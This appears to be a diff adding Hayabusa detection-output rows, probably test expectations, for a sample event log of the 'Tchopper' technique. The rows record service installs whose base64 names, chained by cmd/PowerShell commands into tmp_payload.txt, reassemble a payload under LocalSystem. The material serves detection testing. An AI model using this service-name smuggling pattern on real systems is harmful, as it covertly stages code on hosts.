+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
